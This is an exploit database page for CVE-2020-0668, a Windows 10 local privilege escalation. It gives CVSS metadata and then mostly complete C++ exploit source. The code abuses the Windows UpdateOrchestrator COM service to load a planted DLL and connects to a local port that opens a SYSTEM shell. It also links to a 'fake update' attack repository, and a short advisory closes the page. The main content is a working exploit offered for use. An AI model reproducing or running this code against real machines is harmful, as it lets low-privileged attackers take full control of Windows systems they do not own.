Windows Kernel Elevation of Privilege Vulnerability
CVE
Category
Price
Severity
CVE-2020-0668
CWE-XXX
Unknown
High
Author
Risk
Exploitation Type
Date
Unknown
High
Local
2020-02-29
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Local AV The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required Low PR The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources. User Interaction None UI The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020150 Windows Kernel Elevation of Privilege Vulnerability # Exploit Title: Windows Kernel Elevation of Privilege Vulnerability + PWN-OS-FAKE UPDATE Windows 10 - Local
# Author: nu11secur1ty
# Date: 2020-02-27
# Vendor: Microsoft
# Link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
# CVE: 2020-0668
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668
[+] twitter.com/nu11secur1ty
[Exploit Program Code]
# 2020-0668-WKEPV
- - 2020-0668-WKEPV.cpp
#include <iostream>
#include "MiniUsoClient.h"
#include "TcpClient.h"
#define TEMPO 2000
int wmain(int argc, wchar_t** argv)
{
TcpClient tcpClient;
int iRes = 0;
// Try to trigger DLL loading with 'StartScan'
wprintf_s(L"[*] Using UpdateOrchestrator->StartScan()\n");
MiniUsoClient miniUsoClient;
if (!miniUsoClient.Run(USO_STARTSCAN))
return 1;
//wprintf_s(L"[*] Waiting for the DLL to be loaded...\n");
Sleep(TEMPO);
iRes = tcpClient.connectTCP("127.0.0.1", "1337");
if (iRes != 0)
{
wprintf_s(L"[*] Retrying with UpdateOrchestrator->StartInteractiveScan()\n");
if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN))
return 2;
Sleep(TEMPO);
iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}
if (iRes != 0)
{
wprintf_s(L"[*] Retrying with UpdateOrchestrator->StartDownload()\n");
if (!miniUsoClient.Run(USO_STARTDOWNLOAD))
return 3;
Sleep(TEMPO);
iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}
if (iRes != 0)
{
wprintf_s(L"[-] Exploit failed.");
}
else
{
wprintf_s(L"[+] Exploit successfull @nu11secur1ty");
}
return 0;
}
-----------------------------------------------------------------
- - MiniUsoClient.cpp
#include "MiniUsoClient.h"
#pragma comment(lib, "rpcrt4.lib")
MiniUsoClient::MiniUsoClient()
{
HRESULT hResult;
hResult = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hResult))
{
wprintf_s(L" |__ CoInitializeEx() failed. Error code = 0x%08X\n", hResult);
_ready = false;
}
else
{
_ready = true;
}
}
MiniUsoClient::~MiniUsoClient()
{
CoUninitialize();
}
void MiniUsoClient::ThrowOnError(HRESULT hResult)
{
if (hResult != 0)
{
throw _com_error(hResult);
}
}
bool MiniUsoClient::Run(UsoAction action)
{
HRESULT hResult;
if (this->_ready)
{
wprintf_s(L" |__ Creating instance of 'UpdateSessionOrchestrator'... ");
GUID CLSID_UpdateSessionOrchestrator = { 0xb91d5831, 0xb1bd, 0x4608, { 0x81, 0x98, 0xd7, 0x2e, 0x15, 0x50, 0x20, 0xf7 } };
IUpdateSessionOrchestratorPtr updateSessionOrchestrator;
hResult = CoCreateInstance(CLSID_UpdateSessionOrchestrator, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&updateSessionOrchestrator));
if (FAILED(hResult))
{
wprintf_s(L"\n |__ CoCreateInstance() failed. Error code = 0x%08X\n", hResult);
CoUninitialize();
return false;
}
wprintf_s(L"Done.\n");
IUsoSessionCommonPtr usoSessionCommon;
GUID IID_IUsoSessionCommon = { 0xfccc288d, 0xb47e, 0x41fa, { 0x97, 0x0c, 0x93, 0x5e, 0xc9, 0x52, 0xf4, 0xa4 } };
try
{
wprintf_s(L" |__ Creating a new Update Session... ");
updateSessionOrchestrator->CreateUpdateSession(1, &IID_IUsoSessionCommon, &usoSessionCommon);
wprintf_s(L"Done.\n");
//wprintf_s(L" |__ Calling 'CoSetProxyBlanket()'... ");
ThrowOnError(CoSetProxyBlanket(usoSessionCommon, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, NULL));
//wprintf_s(L"Done.\n");
switch (action)
{
case USO_STARTSCAN:
wprintf(L" |__ Calling 'StartScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0, 0, L"ScanTriggerUsoClient"));
wprintf(L"Done.\n");
break;
case USO_STARTDOWNLOAD:
wprintf(L" |__ Calling 'StartDownload'... ");
ThrowOnError(usoSessionCommon->Proc22(0));
wprintf(L"Done.\n");
break;
case USO_STARTINTERACTIVESCAN:
wprintf(L" |__ Calling 'StartInteractiveScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0xffffffff, 0, L"ScanTriggerUsoClientInteractive"));
wprintf(L"Done.\n");
break;
}
}
catch (const _com_error& error)
{
wprintf_s(L"\n |__ Something went wrong (%08X - \"%ls\").\n", error.Error(), error.ErrorMessage());
return false;
}
}
else
{
return false;
}
return true;
}
-------------------------------------------------------------------
- - TcpClient.cpp
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include "TcpClient.h"
#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")
TcpClient::TcpClient(){}
TcpClient::~TcpClient()
{
WSACleanup();
}
int TcpClient::connectTCP(const char* hostname, const char* port)
{
WSADATA wsaData;
SOCKET socketClient = INVALID_SOCKET;
struct addrinfo* result = NULL, * ptr = NULL, hints;
int iResult = 0;
//int recvbuflen = BUFSIZE;
DWORD dwThreadIdOut;
DWORD dwThreadIdIn;
HANDLE hThreadOut;
HANDLE hThreadIn;
// Initialize Winsock
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0) {
wprintf_s(L"WSAStartup failed with error: %d\n", iResult);
return 1;
}
ZeroMemory(&hints, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
// Resolve the server address and port
iResult = getaddrinfo(hostname, port, &hints, &result);
if (iResult != 0) {
wprintf_s(L"getaddrinfo failed with error: %d\n", iResult);
WSACleanup();
return 1;
}
// Attempt to connect to an address until one succeeds
for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
// Create a SOCKET for connecting to server
socketClient = socket(ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (socketClient == INVALID_SOCKET) {
wprintf_s(L"socket failed with error: %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// Connect to server.
iResult = connect(socketClient, ptr->ai_addr, (int)ptr->ai_addrlen);
if (iResult == SOCKET_ERROR) {
closesocket(socketClient);
socketClient = INVALID_SOCKET;
continue;
}
break;
}
freeaddrinfo(result);
if (socketClient == INVALID_SOCKET) {
wprintf_s(L"[-] Unable to connect to server!\n");
WSACleanup();
return 1;
}
// Create a thread to receive data from the socket in an infinite loop
hThreadOut = CreateThread(NULL, 0, ReceiveDataFromSocket, (LPVOID)socketClient, 0, &dwThreadIdOut);
if (hThreadOut == NULL)
{
wprintf_s(L"[-] Create thread failed: ReceiveDataFromSocket\n");
return -1;
}
// Create a thread to read user input in an infinite loop
hThreadIn = CreateThread(NULL, 0, SendDataFromConsole, (LPVOID)socketClient, 0, &dwThreadIdIn);
if (hThreadIn == NULL)
{
wprintf_s(L"[-] Create thread failed: SendDataFromConsole\n");
return -1;
}
wprintf_s(L"[+] Spawning shell...\n");
// Wait for the socket to be closed
WaitForSingleObject(hThreadOut, INFINITE);
// shutdown the connection since no more data will be sent
iResult = shutdown(socketClient, SD_SEND);
if (iResult == SOCKET_ERROR) {
wprintf_s(L"shutdown failed with error: %d\n", WSAGetLastError());
closesocket(socketClient);
WSACleanup();
return 1;
}
// cleanup
CloseHandle(hThreadIn);
CloseHandle(hThreadOut);
closesocket(socketClient);
WSACleanup();
return 0;
}
DWORD WINAPI TcpClient::ReceiveDataFromSocket(LPVOID lpvParam)
{
int iResult;
SOCKET socketClient = (SOCKET)lpvParam;
char bufReceive[BUFSIZE];
while (true)
{
ZeroMemory(bufReceive, BUFSIZE);
iResult = recv(socketClient, bufReceive, BUFSIZE, 0);
if (iResult > 0)
{
printf("%s", bufReceive);
}
else
break;
}
return 0;
}
DWORD WINAPI TcpClient::SendDataFromConsole(LPVOID lpvParam)
{
HANDLE hStdin;
BOOL bSuccess = FALSE;
DWORD dwRead = 0;
SOCKET socketClient = (SOCKET)lpvParam;
int iResult = 0;
char bufCmd[BUFSIZE];
char* pCr = { 0 };
char* pLf = { 0 };
// Get a handle on standard input
hStdin = GetStdHandle(STD_INPUT_HANDLE);
if (hStdin == INVALID_HANDLE_VALUE)
return 1;
while (true)
{
bSuccess = ReadFile(hStdin, bufCmd, BUFSIZE, &dwRead, NULL);
if (bSuccess == FALSE)
break;
pCr = strchr(bufCmd, '\r');
if (pCr != NULL)
{
pLf = strchr(bufCmd, '\n');
if (pLf != NULL)
{
pCr[0] = '\n';
pLf[0] = 0;
}
}
iResult = send(socketClient, bufCmd, (int)strlen(bufCmd), 0);
if (iResult == SOCKET_ERROR) {
printf("send failed with error: %d\n", WSAGetLastError());
break;
}
}
return 0;
}
- - PWN-OS-FAKE-UPDATE
[link]
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668/PWN-Fake-UPDATE-WIN10/Microupdate
#######################################################################
[Vendor]
Microsoft
[Vulnerability Type]
Windows Kernel Elevation of Privilege Vulnerability
[CVE Reference]
An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.
To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.
The security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.
[Security Issue]
This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows.
An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the Tracing functionality used by the Routing and Remote Access service.
The issue results from the lack of proper permissions on registry keys that control this functionality.
An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM.
[Network Access]
Local
[Video]
https://www.youtube.com/watch?v=ml2feXa6cCY
[Disclosure Timeline]
Published: 02/11/2020
[Conclusion]
The building of a new module for restricting and checking a malicious execution code from any local user on the machine.
For example, please see:
https://github.com/nu11secur1ty/insmod_block
@nu11secur1ty
https://www.nu11secur1ty.com/
BR
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum